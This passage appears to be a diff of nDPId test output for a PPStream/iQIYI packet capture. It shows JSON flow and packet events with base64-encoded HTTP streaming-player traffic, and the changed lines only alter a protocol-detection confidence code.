ZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01291{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01291{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7580000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1467353140677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353140677,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0b19AADMGyurKbA7dwKhzCABQxSpsAhW90liKZlAYABAfBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7580000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1467353140709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":944,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":944,"pkt_l4_len":910,"thread_ts_msec":1467353140709,"pkt":"TF4M6gNlABxCjnAxCABFAAOiA\/BAAIAG5m3AqHMIymwO28UpAFCvhj83b730NFAYAQRULwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0xMTcmdG0zMT0wJnRtMzI9NDcmdG0zMz03OCZ0bTM0PTEmdG00PTEzNyZ0bTQxPTAmdG00Mj0xNiZ0bTQzPTEyNSZ0bTQ0PTImdG01PTE2NSZ0bTUxPTAmdG01Mj0wJnRtNTM9MCZ0bTU0PTEwJnRtNj0mdG02Mj0wJnRtNjM9MCZ0bTc9MCZ0bTcxPTAmdG03Mj0wJnRtNzM9MCZ0bTg9MCZ0bTgxPTAmdG04Mj0wJnRtODM9MCZ0bTk9OTE2JnRtOTI9MTYmdG05Mz02MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZyYT0yJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01470{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7580000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01470{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7580000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1467353140720,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140720,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5F1lAADMGIt3KbA7swKhzCABQxSvXmoUy4BpnKlAYACB7oAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1467353140755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":656,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":656,"pkt_l4_len":622,"thread_ts_msec":1467353140755,"pkt":"TF4M6gNlABxCjnAxCABFAAKCA\/NAAIAGOsjAqHMIZeMgJ8UsAFDdytkdPM+rpVAY\/\/BCUgAAR0VUIC92aS81MDA0OTQ2MDAvNTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEvP3NyYz0xXzExXzExNCBIVFRQLzEuMQ0KSG9zdDogY2FjaGUudmlkZW8uaXFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} -00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}} 01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1467353140794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhBAADEGzgRl4yAnwKhzCABQxSw8z6ul3crbd1AQPSRKcgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkFjY2Vzcy1Db250cm9sLUFsbG93LUNyZWRlbnRpYWxzOiB0cnVlDQoNCmQ0OQ0KeyJjblByZW1UaW1lIjowLCJlZGl0b3JJbmZvIjoiIiwidmlkZW9RaXB1SWQiOjUwMDQ5NDYwMCwicmV3YXJkQWxsb3dlZCI6MCwibnVybCI6IiIsInN1cElkIjowLCJvbmxpbmVTdGF0dXMiOjEsImR0eXBlIjozLCJwdnUiOiIiLCJpc3N1ZVRpbWUiOjIwMTYwNjI1LCJ3cml0ZXIiOiIiLCJpc1RvcENoYXJ0IjowLCJxaXlpUGxheVN0cmF0ZWd5Ijoi5q+P5ZGo5LqU5ZGo5YWtMjA6MDAiLCJ1cCI6IjIwMTYtMDYtMjkgMTk6NDc6MDIiLCJpcExpbWl0IjowLCJ1biI6IiIsImV4Y2x1c2l2ZSI6MSwidm4iOiLjgIrkuIDmtL7mlrnoqIDjgItDLUJsb2Nr6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwicHR1cmwiOiIiLCJzdGFydFRpbWUiOi0xLCJzdCI6MjAwLCJ0eSI6MjAxNjA2MjUsInNtIjowLCJzaG93Q2hhbm5lbElkIjo2LCJwb3Z1IjoiIiwicHJvZHVjZXJzIjoiIiwiZXRtIjoiIiwic3VwTmFtZSI6IiIsInR2RW5hbWUiOiIiLCJzYyI6MCwiY2MiOjAsIm1kb3duIjowLCJwYW5vIjp7InR5cGUiOjF9LCJtYWluQWN0b3JSb2xlcyI6W10sInN1YktleSI6IjIwNDA3NjcwMSIsImFwaWMiOiJodHRwOlwvXC9waWM1LnFpeWlwaWMuY29tXC9pbWFnZVwvMjAxNjA2MjVcL2Q3XC81OVwvdl8xMTA1ODM2NjZfbV82MDEuanBnIiwiZXMiOjEsInByb2R1Y2VyIjoiIiwiZW5kVGltZSI6LTEsImF1IjoiaHR0cDpcL1wvd3d3LmlxaXlpLmNvbVwvdl8xOXJybGpmM2hnLmh0bWwiLCJjaXJjbGUiOnsidHlwZSI6MiwiaWQiOjIwNQ=="} 01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1467353140794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhFAADEGzgNl4yAnwKhzCABQxSw8z6+l3crbd1AQPSTsVQAANDczOTQ3fSwiaXNEaXNwbGF5Q2lyY2xlIjoxLCJwYXlNYXJrIjowLCJwbGMiOnsiNCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxMCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCI1Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjExIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjEyIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjciOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTgiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTMiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTQiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiOCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNSI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIzIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjE3Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjIiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjEiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjAiOnsiY29hIjoxLCJkb3duQWxkIjoxfX0sIm50dmQiOjAsInR2Rm9jdXNlIjoi6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwiY1R5cGUiOjcsInFpeWlQcm9kdWNlZCI6MSwidm90ZXMiOltdLCJhbGJ1bVFpcHVJZCI6NTAwNDk0NjAwLCJjYXRlZ29yeUtleXdvcmRzIjoi57u86Im6LDUwMDQ5NDYwMCwwLGh0dHA6XC9cL2xpc3QuaXFpeWkuY29tXC93d3dcLzZcLy0tLS0tLS0tLS0tLS0tLS0tLS5odG1sIOWGheWcsCwxNTEsMSxodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8xNTEtLS0tLS0tLS0tLS0tLS0tLS0uaHRtbCDlhbblroMsMTYxLDIsaHR0cDpcL1wvbGlzdC5pcWl5aS5jb21cL3d3d1wvNlwvLTE2MS0tLS0tLS0tLS0tLS0tLS0tLmh0bWwg5q2M6IieLDIxMjEsMixodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8tMjEyMS0tLS0tLS0tLS0tLQ=="} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1467353140888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140888,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5fz1AADMGuwnKbA7bwKhzCABQxSlvvfQ0r4ZCsVAYADyHfQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01200{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1467353141138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1467353141138,"pkt":"TF4M6gNlABxCjnAxCABFAAJYBBhAAIAG54\/AqHMIymwO28UtAFDtOXdacCs02FAYAQQdugAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01140{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01140{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 